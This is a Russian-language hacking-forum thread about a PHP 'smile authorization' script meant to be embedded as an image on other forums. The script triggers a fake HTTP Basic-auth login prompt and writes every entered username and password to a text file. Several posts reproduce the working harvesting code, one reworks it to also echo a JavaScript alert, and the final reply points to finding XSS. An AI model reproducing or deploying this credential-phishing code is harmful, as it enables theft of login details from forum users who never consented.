Помогите с php вопросом (диалоговое окно)

Discussion in 'Болталка' started by stalker0007, 7 Jun 2014.

  1. stalker0007

    stalker0007 Member

    Joined:
    1 Oct 2009
    Messages:
    100
    Likes Received:
    20
    Reputations:
    0
    есть php скрипт (смайл авторизация)

    Code:
    <?
    //делаем скрипт картинкой
    header("Content-type: image/gif");
    //делаем изображение смайликом из архива
    $image = imagecreatefromgif('mellow.gif');
    if(!$_COOKIE['LOGON'])
    {
     $login = $_SERVER['PHP_AUTH_USER'];
     $pass  = $_SERVER['PHP_AUTH_PW'];
     //Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
     if(strlen($pass) <= 4 || !$login)
     {
      Header('HTTP/1.1 401 Unauthorized');
      Header('WWW-Authenticate: Basic realm="coastal.ru - login"');
     }
     elseif($login)
     {
      //ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис ))
      setcookie('LOGON',md5($pass));
      //запишем пароли в файл
      $f = fopen('passwords.txt', 'ab'); //passwords.txt
      fwrite($f, $login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD
      fclose($f);
     }
    }
    imagegif($image);
    imagedestroy($image);
    ?>
    
    Кто может переписать код что бы вместо окна где нужно вводить логин и пароль выскакивало просто диалоговое окно с таким то сообщением.
     
  2. оlbaneс

    оlbaneс Moderator

    Joined:
    5 Nov 2007
    Messages:
    1,494
    Likes Received:
    822
    Reputations:
    355
    Интересно, я из пхп чего нить еще помню?
    Там короче условие типа если кука показывает что незалогинен, то идет скрипт авторизации.
    PHP:
    {
     
    $login $_SERVER['PHP_AUTH_USER'];
     
    $pass  $_SERVER['PHP_AUTH_PW'];
     
    //Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
     
    if(strlen($pass) <= || !$login)
     {
      
    Header('HTTP/1.1 401 Unauthorized');
      
    Header('WWW-Authenticate: Basic realm="coastal.ru - login"');
     }
     elseif(
    $login)
     {
      
    //ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис ))
      
    setcookie('LOGON',md5($pass));
      
    //запишем пароли в файл
      
    $f fopen('passwords.txt''ab'); //passwords.txt
      
    fwrite($f$login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD
      
    fclose($f);
     }
    Замени его на аллерт с нужным текстом. Или чего ты там хочешь?
     
    _________________________
  3. MagVeyt

    MagVeyt New Member

    Joined:
    10 Jun 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    в коде нет этого окна...здесь просто алгоритм обработки логина и пароля
     
  4. stalker0007

    stalker0007 Member

    Joined:
    1 Oct 2009
    Messages:
    100
    Likes Received:
    20
    Reputations:
    0
    Как оставить тот же смысл со смайлом что где бы я не поставил на сайт код

    <img>смайл-авторизаци.ру/Smile.php</img>

    вылезало не окно авторизации а ---> а просто окно(аллерт) с моим текстом
     
  5. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    428
    Likes Received:
    32
    Reputations:
    1
    Code:
    <?php
    //делаем скрипт картинкой
    
    //делаем изображение смайликом из архива
    
    if(!$_COOKIE['LOGON'])
    {
     $login = $_SERVER['PHP_AUTH_USER'];
     $pass  = $_SERVER['PHP_AUTH_PW'];
     //Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
     if(strlen($pass) <= 4 || !$login)
     {
      Header('HTTP/1.1 401 Unauthorized');
      Header('WWW-Authenticate: Basic realm="coastal.ru - login"');
     }
     elseif($login)
     {
      //ставим кукис, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли кукис ))
      setcookie('LOGON',md5($pass));
      //запишем пароли в файл
      $f = fopen('passwords.txt', 'ab'); //passwords.txt
      fwrite($f, $login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD
      fclose($f);
     }
    }
    echo "<script>alert('ТВОЙ ТЕКСТ и можно еще что то из значений вставить: ".$_COOKIE['LOGON']."');</script>";
    ?>
     
  6. stalker0007

    stalker0007 Member

    Joined:
    1 Oct 2009
    Messages:
    100
    Likes Received:
    20
    Reputations:
    0
    tmp спасибо, но к сож. не выполняется при помещении на сайт

    <img>сайт.ру/smile.php</img>
     
    #6 stalker0007, 8 Jun 2014
    Last edited: 8 Jun 2014
  7. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    428
    Likes Received:
    32
    Reputations:
    1
    Конечно он так не выполнится :) Его нужно уже инклудить. Или через ифрейм вставить :) Это же уже не картинка. Ты же просил не картинку. Может я что то не так понял, тогда сорри. :)
     
    #7 tmp, 8 Jun 2014
    Last edited: 8 Jun 2014
  8. stalker0007

    stalker0007 Member

    Joined:
    1 Oct 2009
    Messages:
    100
    Likes Received:
    20
    Reputations:
    0

    Смотри есть php (смайл авторизации) старая тема
    взято с сайта извиняюсь за линк.

    Если все это дело залить на хостинг после взять путь http://сайт.ру/smile.php
    засунуть в теги <img>http://сайт.ру/smile.php</img>

    и запостить где либо на сайтах где разрешены bb коды (форумах) после обновить тот раздел где бы размещен этот код появится окно авторизации если человек введет что либо в окно авторизации в том месте где код появляется картинка smile.gif

    ---------------------

    Вот мне нужна суть одна и та же только что бы вместо окна авторизации появлялось окно где будет написан мой текст.
     
  9. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    428
    Likes Received:
    32
    Reputations:
    1
    :) Не, так не получится. )) Для этих целей ищи либо xss либо юзай картинку. Можешь картинку сделать в 1x1px.
     
Loading...